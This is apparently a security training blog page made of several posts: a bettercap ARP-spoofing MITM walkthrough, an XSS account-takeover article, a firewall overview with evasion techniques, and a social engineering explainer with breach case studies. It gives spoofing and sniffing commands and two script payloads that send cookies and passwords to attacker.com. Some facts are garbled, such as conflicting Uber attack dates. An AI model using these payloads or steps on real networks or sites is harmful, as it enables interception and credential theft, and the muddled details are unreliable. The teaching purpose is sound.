securiumsolutions

A Man-in-the-Middle (MITM) attack is a type of cyber attack where an attacker secretly intercepts communication between two parties who believe they are directly communicating with each other. In other words, the attacker stands in the middle of the communication channel between two users or devices, without them knowing.

Installing bettercap:

<apt-get install bettercap>

I have already installed it.

To run it type bettercap and then type help

Performing MITM: To perform mitm we will use following modules-

1. net.probe: this will send different types of probe packet to IP’s present in the subnet for net.recon module to detect them
2. net.recon: periodically detects arp table to detect new hosts in the network.
3. Arp.spoof: spoofs selected host to perform MITM
4. Net.sniff: This module is network packet sniffer and fuzzer

You can type help following with the module name to grab some details about:

Lets start our MITM :-
1. Start the prober module to send probe packet to devices in the network .(Note-probe module can automatically turn on net.recon module)
<net.probe on>

2. Start host discovery

<net.recon on>

3. Set the arp.spoof module option fullduplex to true

< set arp.spoof.fullduplex true >

4. Specify the target to spoof

[set arp.spoof.targets <ip> ]

5. Start ARP spoofer:

<arp.spoof on>

6. Start the packet sniffer:

<net.sniff on>

7. Type help to see the modules running

Now see arp table in any machine connected to that network, in my case I checked in my windows machine by using command <arp -a>. and notice that arp of attacker machine and router is same because Windows machine ‘thinks’ the router MAC address is the same as the Kali since the ARP table is spoofed.

What is cross-site scripting (XSS)?

Cross-site scripting (XSS) remains one of the most prevalent and dangerous web security vulnerabilities. Essentially, XSS allows attackers to inject malicious script into web pages that are viewed by other users. But did you know that sophisticated XSS attacks can lead to full-blown account takeovers (ATOs)? In this blog, we’ll explore how XSS lead to ATOs.

How XSS Leads to Account Takeover

Account Takeover (ATO) is a serious threat where an attacker gains unauthorized access to a user’s account. XSS can facilitate ATO through various methods:

1. Session Hijacking

One of the most direct ways XSS leads to ATO is through session hijacking. When an attacker injects malicious JavaScript into a web page via XSS, they can access the victim’s session cookies if the application does not implement proper cookie security settings.

For Example:

<script>fetch(‘http://attacker.com?cookie=’+document.cookie);</script>

This script sends the victim’s cookies to the attacker’s server, allowing the attacker to impersonate the victim by stealing their session. But it only for when cookie security settings does not implement properly.

2. Credential Theft

XSS can also be used to steal credential, attacks directly fetch credential of victim. An attacker used the feature of web browser that is auto fill the password.

For Example:
<input id=username name=username>
<input type=password name=password onchange=’if(this.value.length)
fetch(“http://attacker.com?username=”+username.value+”&password=”this.value)’>

This script collects the victim’s username and password when they interact with the website and the credentials sends it to the attacker’s server.

Mitigating XSS to Prevent ATO

Preventing XSS and thereby reducing the risk of ATO involves a combination of best practices and security measures:

1. Input Validation and Output Encoding:

Ensure that all user inputs are properly validated and sanitized. Use context-sensitive output encoding to prevent the injection of malicious scripts.

2. Secure Cookie Attributes:

Use secure attributes for cookies, such as `HttpOnly`, `Secure`, and `SameSite`, to reduce the risk of session hijacking. The `HttpOnly` attribute prevents JavaScript from accessing cookies, `Secure` ensures cookies are only sent over HTTPS, and `SameSite` restricts cross-site requests.

3. Content Security Policy (CSP):

Implement a strong Content Security Policy to restrict the sources from which scripts can be loaded. CSP can help mitigate XSS by preventing the execution of unauthorized scripts.

4. Regular Security Audits:

Conduct regular security assessments, including penetration testing and code reviews, to identify and remediate XSS vulnerabilities before they can be exploited.

5. User Education:

Educate users about the risks of phishing and social engineering attacks. Awareness can help them recognize suspicious behavior and avoid falling victim to XSS-based attacks.

Conclusion:

The art of exploiting XSS vulnerabilities to achieve an Account Takeover underscores the critical need for robust web security practices. By understanding how XSS can lead to ATO, organizations can better prepare and defend against these threats. Implementing preventive measures, such as input validation, secure cookie practices, and CSP, along with regular security reviews, can significantly reduce the risk and protect users from account takeovers.

Firewalls are a very important part of any organization’s security infrastructure. They act as a barrier between trusted networks and harmful sources.

This Module helps to know about firewalls — their functionality, configurations, and strategies to bypass or enhance their security, giving ethical hackers the knowledge to test and secure these systems.

Let’s explore what this module offers and why firewalls are the firstline of network defense.

What is a Firewall?

A firewall is a security device or software that monitors and controls incoming and outgoing traffic based on predefined rules. It works as a digital gatekeeper which allows legitimate traffic while blocking malicious or unauthorized access. Firewalls are essential for securing networks from threats like malware, hackers, and unauthorized users.

Main Topics :

#Types of Firewalls

1. Packet-Filtering Firewalls

This firewall examine individual packets of data against a set of predefined rules. These rules are based on criteria like source and destination IP addresses, ports, and protocols.

• How It Works:
  • Filters traffic based on headers in each packet.
  • Blocks or allows packets based on the rule set (e.g., block port 23 for Telnet).
• Strengths:
  • Simple and fast.
  • Effective for basic traffic control.
• Limitations:
  • Cannot analyze packet content or track sessions.
  • Vulnerable to attacks like IP spoofing.

2. Stateful Inspection Firewalls

They track the state of active connections and use this context to make filtering decisions.

• How It Works:
  • Maintains a state table to monitor ongoing connections.
  • Only allows packets that are part of established sessions.
• Strengths:
  • Provides better security by understanding connection states.
  • Prevents unauthorized access while allowing legitimate traffic.
• Limitations:
  • More resource-intensive than packet-filtering firewalls.
  • Requires more configuration and management.

3. Proxy Firewalls

These firewalls work between users and the server.  All traffic passes through the proxy, which analyzes and filters it before forwarding.

• How It Works:
  • Inspects traffic content.
  • Masks the user’s IP address, enhancing anonymity.
• Strengths:
  • Offers detailed content inspection and robust security.
  • Can block specific content or applications, such as websites or downloads.
• Limitations:
  • Slower compared to other types due to in-depth analysis.
  • May require significant configuration and maintenance.

4. Next-Generation Firewalls (NGFWs): Combine traditional firewalls with advanced features like deep packet inspection, intrusion prevention, and application-level filtering.

#Firewall Architectures

• Network-Based Firewalls: Deployed at network perimeters to secure large-scale systems.
• Host-Based Firewalls: Installed on individual devices to protect them directly.
• Cloud Firewalls: Secure virtual environments and cloud-based resources.

#How Firewalls Work

A firewall enforces security policies through Access Control Lists and predefined rules.

• Inbound and Outbound Filtering: Monitoring data entering or leaving the network.
• Rule Creation: Setting up rules based on IP addresses, ports, and protocols.
• Zones and Interfaces: Configuring trusted, untrusted, and DMZ zones for better segmentation.

#Firewall Evasion Techniques

Ethical hackers need to understand how attackers bypass firewalls to secure them better.

1. Tunneling

Tunneling involves making malicious traffic within trusted protocols like HTTP or HTTPS, making it appear harmless. Since firewalls often allow these protocols for regular web traffic, malicious payloads can pass undetected.

• Defense:
  • Use deep packet inspection to analyze the content of traffic.
  • Restrict unnecessary protocols and monitor for unusual traffic patterns.

2. Spoofing

Spoofing involves manipulating packet headers, such as source or IP addresses, to disguise the traffic or bypass rules. This can trick firewalls into allowing unauthorized traffic.

• Defense:
  • Implement strict IP validation and anti-spoofing measures.

3. Misconfiguration Exploitation

Attackers can exploit overly permissive firewall rules such as open ports or weak rules, provide an easy way to bypass security controls.

• Defense:
  • Regularly review and update firewall rules.
  • Use automated tools to audit configurations.

4. Encryption

Encryption is used to hide malicious traffic within encrypted connections, such as HTTPS or VPNs. Since the content is encrypted, firewalls cannot inspect the payload without decryption.

• Defense:
  • Implement SSL/TLS inspection to analyze encrypted traffic.

#Firewall Hardening and Countermeasures

• Ensuring firmware and rules are up-to-date.
• Avoiding overly permissive rules and keeping ACLs clean.
• Using VLANs and zones to isolate sensitive resources.
• Combining firewalls with IPS for better threat detection.
• Continuously analyzing firewall logs to detect suspicious activities.

Conclusion

This module guides us to understand, configure, and test firewalls. Whether you’re learning about basic packet-filtering firewalls or advanced next-gen firewalls, this module ensures you’re equipped with the skills to identify vulnerabilities and defend against  threats.

Firewalls just help you to detect malicious entry in your system but you have to remove it from your system yourselves.

What Is Social Engineering?

social engineering is not a cyber attack.Social engineering is the tactic of manipulating, influencing, or deceiving a victim in order to gaining control/access over a computer system and servers, or to steal personal and financial information and many more thing of victims,company and organization. Social engineers, those who exploit social engineering attacks, exploit this, essentially “hacking” humans.

How does social engineering work?

In a typical social engineering attack, a cybercriminal will communicate with the intended victim by saying they are from a trusted organization. In some cases, they will even impersonate a person the victim knows.

For examples:

Imagine someone receives a generic message warning them of fraudulent activity on their bank account. They might ignore it, thinking it’s a spam message. However, if the message appears to come directly from their bank, with accurate branding and a familiar tone, they are more likely to pay attention.This message more make believable,the attacker might include specific details that resonate with the victim’s recent activities.Scenario,it could mention a suspicious charge from a country they recently visited or a duplicate charge for a bill they have already legitimately paid. This specific key information increases the sense of urgency and legitimacy, increasing the likelihood that the victim will engage.and this message is increase in u leverage emotional triggers such as fear and urgency.

Types of social engineering attacks?

Cyber criminals often employ social engineering tactics to exploit human vulnerabilities. These attacks can take various forms, such as text messages, phone calls, or in-person interactions.Social engineering attacks come in many different forms and can be performed anywhere where human interaction is involved. Let’s explore some of the common methods used in each category.

Phishing: This process to attempting the acquire sensitive information such as usernames, passwords, and credit card details by misleading by using bulk email, SMS text messaging, or by phone. Phishing messages create a sense of urgency, curiosity, or fear this message triggered emotion. The message will prod victims into revealing sensitive information, clicking on links to malicious websites, or opening attachments that contain malware.

Baiting: A type of social engineering attack where a scammer uses a false promise to lure a victim into a trap which may steal personal and financial information or inflict the system with malware. The trap could be in the form of a malicious attachment with an enticing name.

Example: USB baiting sounds a bit unrealistic, but it happens more often than you might think. Essentially what happens is that cybercriminals install malware on to USB sticks and leave them in strategic places, hoping that someone will pick the USB up and plug it into a corporate environment, there by unwittingly unleashing malicious code into their organization.

Tailgating: Also known as “piggybacking”. Its physical breach where an unauthorized person manipulate and create their way into a restricted or employee only authorized area and they use of social engineering tactics. The attacker might impersonate a delivery driver, or custodian worker. Once the employee opens the door, the attacker asks the employee to hold the door, thereby gaining access to the building.

Dumpster Diving: A scammer will search for sensitive information e.g., bank statements, pre-approved credit cards, student loans, other account information, in the garbage when it hasn’t been properly sanitized or destroyed.

Rogue Wi-Fi Networks: Attackers set up a fake Wi-Fi to intercept data from unsuspecting victims.

If u know about of all types of social engineering u can search on internet.

It’s Social Engineering Case Studies in Companies from internet

Twitter – 2020

In July 2020, hackers gained access to Twitter’s (now known as X) internal systems and compromised high-profile accounts, including those owned by Barack Obama, Elon Musk, Bill Gates, and more. The hackers used social engineering tactics to manipulate employees and gain access to internal tools. They posted fraudulent messages from these accounts promoting a Bitcoin scam, asking people to send cryptocurrency to a specified address.

The incident exposed various security weaknesses and brought into question the company’s ability to protect high-level accounts. This incident damaged users’ trust in Twitter’s security measures, as users and experts criticized the company’s response. The attack caused a temporary drop in Twitter’s stock price and led to a federal investigation.

Uber – 2022 and 2016

In 2020, an attacker used social engineering to compromise Uber‘s systems. The individual who admitted to the hack informed The New York Times that they had sent a text message to an Uber employee, posing as corporate IT personnel. Through social engineering, the attacker convinced the employee to disclose a password, granting the hacker entry into Uber’s systems.

The attacker claimed to have access to internal messaging services, databases, source code and emails.

This was not Uber’s first breach. After a previous attack in 2016, the former Chief Security Officer (CSO) was convicted of federal charges for covering up a data breach involving millions of uber user records. This attack was not related to social engineering. According to reports, developers uploaded code containing credentials to GitHub, where attackers found them and used them to access Uber’s systems, resulting in a data breach affecting 57 million riders.

Uber was fined $1.2 million by British and Dutch data regulators for weak security practices exposed by the attack.

Sony Pictures – 2014

A criminal group named the “Guardians of Peace” targeted Sony Pictures Entertainment. The attack resulted in the theft and release of sensitive company data, including emails, employee information, and unreleased films. According to the US Government, the attackers used phishing to gain access to Sony’s network.

The breach significantly damaged Sony’s reputation, as leaked emails revealed controversial conversations among executives and exposed internal conflicts. The attack cost Sony millions of dollars in remediation efforts, legal settlements, and lost revenue from leaked films. Additionally, the incident prompted legal investigations and raised concerns about cybersecurity vulnerabilities in the entertainment industry.

Social Engineering Prevention

Preventing social engineering attacks requires a combination of awareness, vigilance, and security best practices. Here are some key ways to protect yourself:

1. Awareness and Training like as (e.g., phishing, pretexting, baiting, tailgating).
2. Only permission gives Verify Identities
3. Be Cautious with Emails and Links

• Do not click on unknown or suspicious links.
• Check for red flags in emails:
• Urgency or threats
• Spelling errors
• Unfamiliar sender addresses
• Generic greetings like “Dear User”
• Hover over links to inspect their destination before clicking.

4. Use Strong Authentication
5. Secure Personal Information
6. Phone and In-Person Scams
7. Report Suspicious Activities

• If you suspect a social engineering attempt, report it to your organization’s security team or relevant authorities.
• Keep records of suspicious emails or calls for future reference.

8. Use Security Tools

• Install email filters to detect phishing attempts.
• Use endpoint security solutions to prevent malware infections.
• Enable browser security features to detect malicious sites.
• Would you like tips on how to practice identifying social engineering attacks?